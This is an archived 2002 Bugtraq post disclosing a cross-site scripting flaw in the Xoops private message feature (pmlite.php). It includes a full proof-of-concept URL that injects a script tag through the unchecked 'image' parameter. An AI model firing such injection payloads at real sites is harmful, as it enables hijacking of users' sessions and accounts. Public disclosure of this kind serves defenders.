[24024] in bugtraq
Xoops topics : One more time
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Cabezon_Aur=E9lien?)
Tue Jan 29 14:24:14 2002
Message-ID: <019401c1a8e7$b41f0c90$0301a8c0@London>
From: =?iso-8859-1?Q?Cabezon_Aur=E9lien?= <aurelien.cabezon@isecurelabs.com>
To: <bugtraq@securityfocus.com>
Cc: <staff@securiteam.com>
Date: Tue, 29 Jan 2002 18:09:01 +0100
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Hi again,
I just found an other Script injection issue in Xoops Private Message Box.
http://xooped-site/pmlite.php?to_userid=[USER_ID_OF_TARGET]&msg_id=&image=fo
o.gif'><script>alert("test");</script><img%20src='http://www.isecurelabs.com
/images/barre.jpg&op=submit&theme=snow&subject=Are you sure
?&message=really?&submit=Submit
Again a lack of checks on users input on the *image* variable.
To be continued...
---
Cabezon Aurélien | aurelien.cabezon@isecurelabs.com
http://www.iSecureLabs.com | French Security Portal
____________________________________________
" Sachez qu'aujourd'hui est le plus beau jour de votre vie,
car c'est le premier de ceux qu'il vous reste à vivre "
